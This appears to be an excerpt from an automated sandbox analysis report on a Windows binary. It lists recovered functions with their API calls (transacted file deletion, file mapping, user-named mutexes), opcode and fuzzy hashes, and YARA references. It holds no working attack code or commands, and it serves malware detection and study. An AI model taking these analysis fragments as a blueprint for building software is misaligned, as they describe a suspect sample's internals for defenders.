DeleteFileTransactedA.KERNEL32 ref: 0040BFAE
CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFB9
RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFC1

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
String ID:
API String ID: 3802493581-0
Opcode ID: 8a1692ceb7c8e785c4e15fa7f1df9ef09bcde19464a01561b74476faa2ed77d3
Instruction ID: 547355007cf20099bb36c54f56841c3937d0698fa16353b8c46e2513c7ed7a8d
Opcode Fuzzy Hash: 8a1692ceb7c8e785c4e15fa7f1df9ef09bcde19464a01561b74476faa2ed77d3
Instruction Fuzzy Hash: 79F03A72110512ABEB241A699D08D67366DDF86B607140626F822E32D0E7B499918ABF

Uniqueness

Uniqueness Score: -1.00%

Function 004328A2, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 004328BA
OpenProcessToken.ADVAPI32(00000000), ref: 004328C1
GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 004328D3
CloseHandle.KERNEL32(?,?,00000200), ref: 004328E0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
String ID:
API String ID: 1246687928-0
Opcode ID: 06460245509d9519c63c6540e410947e279762dcf9780fdc2d03f20ef9c2b1ac
Instruction ID: c8f8dd6dcc80abd5cd0b9111c5b2877c261452be115d731e318cacc884f52fba
Opcode Fuzzy Hash: 06460245509d9519c63c6540e410947e279762dcf9780fdc2d03f20ef9c2b1ac
Instruction Fuzzy Hash: D1F01CB1510214BBEB14AFA0DD49EAB7AACEB09340F140575E802F1150E6B4DE14AA6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC95, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AC9A

Strings

", ", xrefs: 0040AD3C
: ", xrefs: 0040AD1E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: ", "$: "
API String ID: 3519838083-747220369
Opcode ID: 237d37b995b15136bdccafaae25be8f4e3fb4aa21462c15dcff6e0c7943fb31b
Instruction ID: 1185dc4ab0c6d020797794a68e7804ba7299d24e8e36f01be1166ce1a8416c8e
Opcode Fuzzy Hash: 237d37b995b15136bdccafaae25be8f4e3fb4aa21462c15dcff6e0c7943fb31b
Instruction Fuzzy Hash: 5E219171A002099BCF14EFA9D915BEEB7B9AF44704F00451FE411E7281DBB85B55CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00455AE1, Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00455276: GetConsoleCP.KERNEL32(8304488B,0044423A,00000000), ref: 004552BE

WriteFile.KERNEL32(?,00000000,?,00442D23,00000000,0043CBF9,0044423A,0044423A,00000010,00442D23,00000000,8304488B,0043CBF9,0043CBF9,?), ref: 00455C32
GetLastError.KERNEL32(?,0044423A), ref: 00455C3C
__dosmaperr.LIBCMT ref: 00455C81

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID:
API String ID: 251514795-0
Opcode ID: 1a7c34ad038346794a19d3a84b7aeac0babd1c7af2a08f4a36f9bbee444bc1f4
Instruction ID: 852c303c7769df4423e883a6c0b946549b9751af01832db66e5141e31868230b
Opcode Fuzzy Hash: 1a7c34ad038346794a19d3a84b7aeac0babd1c7af2a08f4a36f9bbee444bc1f4
Instruction Fuzzy Hash: 6651D171A00A09AFEB11DBA4C855BFF77A9EF0531AF040057ED00A7253D678AD49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004502A6, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 00454EAB: GetLastError.KERNEL32(?,00000000,?,004427D1,00000000,00000000,?,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454EB0
Part of subcall function 00454EAB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0044EC7C,00000000,00000000,00000000,00000000,?), ref: 00454F4E

_free.LIBCMT ref: 00450355
_free.LIBCMT ref: 00450383
_free.LIBCMT ref: 004503CB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 323358b9362a978b0ff9886fa532b228fb9cbba68c02286b993af4112126a93c
Instruction ID: 314243e79a3fe976b560c318aa2a260b96746cd0cec1c394724e6568f747e899
Opcode Fuzzy Hash: 323358b9362a978b0ff9886fa532b228fb9cbba68c02286b993af4112126a93c
Instruction Fuzzy Hash: 86417D35610205AFD724CF6CC885A6AB7F4EF49315B24056EEC15C7392D739EC18DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045040A, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00450436
__cftoe.LIBCMT ref: 00450468
_free.LIBCMT ref: 0045048E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 0fce6a8d1eb35eb033ab67290ff2a7e71ff4337982566564e34bd3b4dfb26512
Instruction ID: 62dddf9d8d458c2faa764e0d7c3781d1d3e3ba2b1e05b4617d017fc6fab8fbb4
Opcode Fuzzy Hash: 0fce6a8d1eb35eb033ab67290ff2a7e71ff4337982566564e34bd3b4dfb26512
Instruction Fuzzy Hash: 9521FB769002087ADF21DB969C06EDF3BA8DF85765F20416BFD15D6283EB34CB08C699

Uniqueness

Uniqueness Score: -1.00%

Function 0041C669, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,?,0041D3F6,00000140,00000000,?,00000000), ref: 0041C686
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041D3F6,00000140,00000000,?,00000000,?,0041DCA2), ref: 0041C6A7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,0041D3F6,00000140,00000000,?,00000000,?,0041DCA2,?,?,00000244,0048813C), ref: 0041C6E1

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Pointer$Create
String ID:
API String ID: 250661774-0
Opcode ID: 3e88e2f5aa1b4a4d48fadbb204e67dbe3f00d5d1936c43c7dc8021dd65747848
Instruction ID: 3e4198878f8f00d0cf9766d7fd2808b388d4b2d97b0639e9827196bbffaf2f80
Opcode Fuzzy Hash: 3e88e2f5aa1b4a4d48fadbb204e67dbe3f00d5d1936c43c7dc8021dd65747848
Instruction Fuzzy Hash: 2611E5B0640301BFE7108F399C89F86BBD8FB09724F104725F924E72C1E3B4A8508B65

Uniqueness

Uniqueness Score: -1.00%

Function 0043A8E2, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 0043A915
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,00000000,?,0043B8B3,?,?,0042A347), ref: 0043A932
CloseHandle.KERNEL32(?,?,?,00004098,00000000,?,0043B8B3,?,?,0042A347), ref: 0043A942

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleMappingView
String ID:
API String ID: 1187395538-0
Opcode ID: fd4b679c806ff1ceaad663414a4f3e8cec77f996e92eac8207f3ad8b1e7fdf5c
Instruction ID: 31b58add01045ba085a6c8995e5b280e13b2d4a68c0b30ea16c75ccdddeb4790
Opcode Fuzzy Hash: fd4b679c806ff1ceaad663414a4f3e8cec77f996e92eac8207f3ad8b1e7fdf5c
Instruction Fuzzy Hash: 1011A9B0540B059EDB318B178804F13BAE8EF99774F119D2FE5C6A1650E278D850CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 004579E9, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0043CBF9,00000000,00000002,0043CBF9,00000000,?,?,?,00457A96,00000000,00000000,0043CBF9,00000002), ref: 00457A22
GetLastError.KERNEL32(?,00457A96,00000000,00000000,0043CBF9,00000002,?,0044415D,?,00000000,00000000,00000001,0043CBF9,?,?,00444213), ref: 00457A2C
__dosmaperr.LIBCMT ref: 00457A33

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0a7973eacd5ff80e62a882f9860be868a7152a25cbc49e0e524569f372db48ac
Instruction ID: 1b1d2904e0186e1705f9c1e80b7ad42afadfa7e0d860c6be1ef793e2df8c0949
Opcode Fuzzy Hash: 0a7973eacd5ff80e62a882f9860be868a7152a25cbc49e0e524569f372db48ac
Instruction Fuzzy Hash: 91019C336141556FCF059F6AEC0589E3B29DBC0321B24021AFC119B292FA74DE019B95

Uniqueness

Uniqueness Score: -1.00%

Function 0045261C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004526CF

Strings

7'E, xrefs: 004526BF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: 7'E
API String ID: 269201875-35007869
Opcode ID: 570d662aff69ef43d6c8e44826a63722993188961788fb03a34b8e40d50387ae
Instruction ID: fc11d46d0ce4129856be9ab7c67fff9d122edc18dd52fffc611f3fe224f8a813
Opcode Fuzzy Hash: 570d662aff69ef43d6c8e44826a63722993188961788fb03a34b8e40d50387ae
Instruction Fuzzy Hash: 2631AE72A00610DF8B14CF59C5C085EB7F1FF8A320726866AD915EB361C774AD05DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB35, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AB3A

Strings

Unknown exception, xrefs: 0040ABA1

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: Unknown exception
API String ID: 3519838083-410509341
Opcode ID: e2349de2c8375c25a200c17d1bb1accffc47efabb0ad416e00196ebd79eb2f9f
Instruction ID: 9acdc572aa98f8c92b16397355be50d459fcbb99479b42bf9e585e8f6d9bef64
Opcode Fuzzy Hash: e2349de2c8375c25a200c17d1bb1accffc47efabb0ad416e00196ebd79eb2f9f
Instruction Fuzzy Hash: AE21AC72900704DFCB14CFA9D4809DABBB1FF08310F10852FE94AAB641D375A615CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00412FE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412FEE

Part of subcall function 0040B271: __EH_prolog.LIBCMT ref: 0040B276

Part of subcall function 0040B3BF: __EH_prolog.LIBCMT ref: 0040B3C4

Strings

CA, xrefs: 00413042

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: CA
API String ID: 3519838083-1052703068
Opcode ID: 2fb229fa9029e89d9895c794153cb5138daf645cd26bb640df27d48953aff647
Instruction ID: 9d37dd602b7f7c4e1c4e2bc690a5cb45ada0cf024665dbb4409e2884ed51f89a
Opcode Fuzzy Hash: 2fb229fa9029e89d9895c794153cb5138daf645cd26bb640df27d48953aff647
Instruction Fuzzy Hash: 2F219A71A01210DFCB64DFA9C885B9ABBF0EF08304F0084AEE509E7291DB349A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004139CE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 00413A25

Strings

4zH, xrefs: 00413A15, 00413A22

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate
String ID: 4zH
API String ID: 1075933841-1911868544
Opcode ID: 61c9d49d09a0075488315c946916857d19bea4ce0ebaa86c7dc2289727031fd2
Instruction ID: 6cf2ef745e1334ef73a7119c116dfc5d8651ae4c44b13ce0b2153ba619183ba0
Opcode Fuzzy Hash: 61c9d49d09a0075488315c946916857d19bea4ce0ebaa86c7dc2289727031fd2
Instruction Fuzzy Hash: EB01DFB2600204BFD7149F6AD881C9EBBACFF48354B20051FF918C3241DA75AE9087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409D6A

Strings

unknown error, xrefs: 00409DBF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: unknown error
API String ID: 3519838083-3078798498
Opcode ID: 86ca76aef3aa1f8c533cb8c086509907f3f6fa87c9c6db94a88cd026a192a169
Instruction ID: 926ec663701e5f9c644046b564d0e207a782f9d7b866a52efc0a2b1e6d8039b7
Opcode Fuzzy Hash: 86ca76aef3aa1f8c533cb8c086509907f3f6fa87c9c6db94a88cd026a192a169
Instruction Fuzzy Hash: 5501B1B0B40200ABCB20AF5A8941A9FFAB8FF85754F50453FF445A3641D77C9D44C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00422B5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422B5F

Strings

type must be string, but is , xrefs: 00422BB6

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: type must be string, but is
API String ID: 3519838083-1861512233
Opcode ID: 7a879a363887bea7d16041a5ffb0d17c41db9a9810b6b2080c230fcd829455ca
Instruction ID: 43f010e3ebe6572bc783c85fba5195f34548821159d81382adb4296b64380a20
Opcode Fuzzy Hash: 7a879a363887bea7d16041a5ffb0d17c41db9a9810b6b2080c230fcd829455ca
Instruction Fuzzy Hash: 3301F572E00244AFC711EFA5D8016EEFBB8EF44348F10452FE455E3241EBB86A45C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B434, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B439

Part of subcall function 00412F47: __EH_prolog.LIBCMT ref: 00412F4C

Strings

directory_iterator::directory_iterator, xrefs: 0040B473

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: directory_iterator::directory_iterator
API String ID: 3519838083-2645264736
Opcode ID: eb0613e5dfb49f7b6d9f1d083e0419b5d030ff1ec57a8e8ca3714d5a89c184c5
Instruction ID: d67e62d4dea5d318fb7e724547b26b3e7b93da6284abc51c0b5bedf92d1934e6
Opcode Fuzzy Hash: eb0613e5dfb49f7b6d9f1d083e0419b5d030ff1ec57a8e8ca3714d5a89c184c5
Instruction Fuzzy Hash: 7FE06571A107159FC718DF68C80169A76E5EB48754F10C53FB519D3740E77889008799

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B6C8

Part of subcall function 00412FE9: __EH_prolog.LIBCMT ref: 00412FEE

Strings

recursive_directory_iterator::recursive_directory_iterator, xrefs: 0040B702

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: recursive_directory_iterator::recursive_directory_iterator
API String ID: 3519838083-3545205060
Opcode ID: f5736abd0f7e9e67b982a9468614d6e3768b3ebed692959a74739e7cf5bb9c7f
Instruction ID: 2c4a16adbb4444f17d6ff1222af2018253b180e0efae07fae5bd193d8cc57c40
Opcode Fuzzy Hash: f5736abd0f7e9e67b982a9468614d6e3768b3ebed692959a74739e7cf5bb9c7f
Instruction Fuzzy Hash: CCE06D71A107159FCB18EF6DC80169ABAE5EB48358F10C93FA519E3740EB78D9008B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

___std_fs_set_current_path@4.LIBCPMT ref: 0041A0B1

Part of subcall function 0040AE9C: __EH_prolog2.LIBCMT ref: 0040AEA3

Strings

current_path(const path&), xrefs: 0041A0BF

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2___std_fs_set_current_path@4
String ID: current_path(const path&)
API String ID: 2482923176-1163517728
Opcode ID: d3b99b4e99f3329b51cbf71842345b491980e76a6324d0ef96cbcd9ccbc10220
Instruction ID: 82301e41dbaf42746000118bc796b7322e1136d075e33cefa4fecd6eb5cc45b3
Opcode Fuzzy Hash: d3b99b4e99f3329b51cbf71842345b491980e76a6324d0ef96cbcd9ccbc10220
Instruction Fuzzy Hash: F8D0C9306162204B8774A96DAA485D351DA5F8D319720842FB944D7740DE688CA587EF

Uniqueness

Uniqueness Score: -1.00%

Function 0040B58C, Relevance: 3.1, APIs: 2, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 0040B4F5: ___std_fs_get_stats@16.LIBCPMT ref: 0040B53F

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040B613

Part of subcall function 0043BDA6: FindNextFileW.KERNEL32(?,?,?,0040B1BE,?,?,?,?,?,0040B24B,?,?,?,?,00000001), ref: 0043BDAF

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040B674

Part of subcall function 0040B192: ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040B1B9

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext___std_fs_get_stats@16
String ID:
API String ID: 224343835-0
Opcode ID: e7a53efd50a159bda63cfca8539c719b76474743ec78e61e0696ebad437bc2e9
Instruction ID: f0c1e4b99f17c28b3fafd662666168e898159837adf807f05a92ff2e1a07f3cf
Opcode Fuzzy Hash: e7a53efd50a159bda63cfca8539c719b76474743ec78e61e0696ebad437bc2e9
Instruction Fuzzy Hash: 7C41DE315006149FDB25DB15C8D5B6AB7F5FF40324F1048AEE052AB6D1DB3AED01CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004556F9, Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,8304488B,0044423A,00000000,?,00455C16,00000010,0044423A,00000000,?,0043CBF9,0044423A), ref: 00455795
GetLastError.KERNEL32(?,00455C16,00000010,0044423A,00000000,?,0043CBF9,0044423A,0044423A,00000010,00442D23,00000000,8304488B,0043CBF9,0043CBF9,?), ref: 004557BB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: d67703b483cd762cddf769dad3cdee1d71b17c0fccde4c702591a015dc5c2fa8
Instruction ID: bb44de9d076e75348dd7533b97219c350a927ad69080bc421cc0be4057028ab5
Opcode Fuzzy Hash: d67703b483cd762cddf769dad3cdee1d71b17c0fccde4c702591a015dc5c2fa8
Instruction Fuzzy Hash: 8221B434A00618DFCB15CF19DD90AEDB7B9EB4D301F1444AAED06D7212D6349D46CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C9F5, Relevance: 3.1, APIs: 2, Instructions: 66windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001200,00000000,?,00000000,00000000,?,00000000), ref: 0043CA25
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0043CA64

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFormatMessageMultiWide
String ID:
API String ID: 988900531-0
Opcode ID: c324064648a7ded04edba6645662a1370de61b26c676c6201409d4d000e34d23
Instruction ID: c78478ef85b5a1eff7ca31fb6a18bd7b824385e687cccd2754a8ce7a71cb805a
Opcode Fuzzy Hash: c324064648a7ded04edba6645662a1370de61b26c676c6201409d4d000e34d23
Instruction Fuzzy Hash: C6012D3260015D375F35BA5A5C88E7F3A6DDFCEB51F04602FF905E1250E5298C108769

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1CA, Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B1CF
___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040B238

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog___std_fs_directory_iterator_open@12
String ID:
API String ID: 2120191866-0
Opcode ID: d1b7fdcbeac25c08a67d3fcb6cb1de82c1b289f8b82b5b28fefd9be92c680520
Instruction ID: 5722b6e84e6724c4ceb8e706b3cf6645d3a8c167cadf45c6b80fd96a1fcfcdee
Opcode Fuzzy Hash: d1b7fdcbeac25c08a67d3fcb6cb1de82c1b289f8b82b5b28fefd9be92c680520
Instruction Fuzzy Hash: 5A11E231610204ABDB20EA99DD45BDE73B5EF49714F10447FF801A62C1DB789A4587AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409F56, Relevance: 3.1, APIs: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00409F73
std::_Lockit::~_Lockit.LIBCPMT ref: 00409FE4

Part of subcall function 00443711: _free.LIBCMT ref: 00443724

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~__free
String ID:
API String ID: 2189227594-0
Opcode ID: b0c7383317004cc0a6d67f1acfd91a464910b261b0f0c7f8095e89fa9fa9a02a
Instruction ID: de2c0876a1ec40cbd6a45d874b50e1c88fa7bfc223779c3c2eb23cc4d0c90ff9
Opcode Fuzzy Hash: b0c7383317004cc0a6d67f1acfd91a464910b261b0f0c7f8095e89fa9fa9a02a
Instruction Fuzzy Hash: C51163B2404B00DEC6355F0AED41A17F7F5AF44F52B208A2FE09656A92CB39AD41DF08

Uniqueness

Uniqueness Score: -1.00%

Function 00412C75, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412C7A

Part of subcall function 0040A2E5: std::system_error::system_error.LIBCPMT ref: 0040A353

std::locale::_Init.LIBCPMT ref: 00412CC2

Part of subcall function 0043C794: std::_Lockit::_Lockit.LIBCPMT ref: 0043C7A6
Part of subcall function 0043C794: std::locale::_Setgloballocale.LIBCPMT ref: 0043C7C1
Part of subcall function 0043C794: _Yarn.LIBCPMT ref: 0043C7D7
Part of subcall function 0043C794: std::_Lockit::~_Lockit.LIBCPMT ref: 0043C817

Part of subcall function 00412D37: __EH_prolog.LIBCMT ref: 00412D3C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarnstd::system_error::system_error
String ID:
API String ID: 2895863627-0
Opcode ID: 3ed82f1ae12599c85b24cd1b49b5bfd5bdca79e3c1c5638cf48ff5257f1a8bf4
Instruction ID: 09485d40355243874096b6c95168a0be954697373a94410d3f93f3cdde1d87f7
Opcode Fuzzy Hash: 3ed82f1ae12599c85b24cd1b49b5bfd5bdca79e3c1c5638cf48ff5257f1a8bf4
Instruction Fuzzy Hash: E6113DB0A00B01BFD304DF6AC5C1655FBA4FF48318F50462FE01997A81D7B8A960CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3A1, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0041DCA2,?,?,00000244,0048813C,00000000,?,0041E019), ref: 0041D3C0
_strlen.LIBCMT ref: 0041D3C7

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory_strlen
String ID:
API String ID: 942933051-0
Opcode ID: b2f2e3b771214cb06099d4984a97da820a19c413440ea39b156d4b3722c2d9a0
Instruction ID: f8d37aa86127becf80dac3cebcbdb6f5f8a0ef5a7408ae8d9042297cefe20fbd
Opcode Fuzzy Hash: b2f2e3b771214cb06099d4984a97da820a19c413440ea39b156d4b3722c2d9a0
Instruction Fuzzy Hash: 9901FCB26042045AD728972DA841FEB33D89B46714F10412FF456D61C1EA78BDC2865D

Uniqueness

Uniqueness Score: -1.00%

Function 0043217E, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432183

Part of subcall function 00432040: lstrlenW.KERNEL32(00000000,?,?,?,00432194), ref: 004320A2
Part of subcall function 00432040: lstrcpyW.KERNEL32 ref: 004320BA
Part of subcall function 00432040: lstrcpyW.KERNEL32 ref: 004320C6

_strlen.LIBCMT ref: 00432197

Part of subcall function 00410FCB: __EH_prolog.LIBCMT ref: 00410FD0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prologlstrcpy$_strlenlstrlen
String ID:
API String ID: 27009005-0
Opcode ID: 3ad636228cd7df217e50e5d6fdcd992132182284107513de294d5b7fa83db409
Instruction ID: 83ef8f1c4772bd90b2ab1f4b2b72089bfd7a3bf54765847bbba68ef37616946c
Opcode Fuzzy Hash: 3ad636228cd7df217e50e5d6fdcd992132182284107513de294d5b7fa83db409
Instruction Fuzzy Hash: 27112C70D01119DAEB19EB65DD51EFEBB359F04344F10819EE40A67142DABC0B45CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 0043AAD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,00DB6F70,?,00000000,?,0043B0BE,?,?,00000001,00000000), ref: 0043AB13

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b53c18efe71da937d46e10460414e0e35e31d1cf10af320b18796a77341b90ba
Instruction ID: e879d821ba48f0c6ccb62a0e1d69e37b95a8f0d07ed6ec6b1c2104af00fab868
Opcode Fuzzy Hash: b53c18efe71da937d46e10460414e0e35e31d1cf10af320b18796a77341b90ba
Instruction Fuzzy Hash: BF01B1B1640B00AFE7218E3998C5BA7FAD9FB19354F10413FF79692250C7B4AC509626

Uniqueness

Uniqueness Score: -1.00%

Function 00432DFB, Relevance: 3.0, APIs: 2, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00432ADA: GetUserNameA.ADVAPI32(?,?), ref: 00432AF5

OpenMutexA.KERNEL32 ref: 00432E4C
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00432E59

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Mutex$CreateNameOpenUser
String ID:
API String ID: 1251385603-0
Opcode ID: 1af22ebc3fa294aed9457f2ddcbbecfa4aa5eca760a3a07bdcd98c3c2e0c10f3
Instruction ID: cdfce9b97ea8dd42138baffcea4a8bd63adf1c8b2f70058774e5c20a19d70dbe
Opcode Fuzzy Hash: 1af22ebc3fa294aed9457f2ddcbbecfa4aa5eca760a3a07bdcd98c3c2e0c10f3
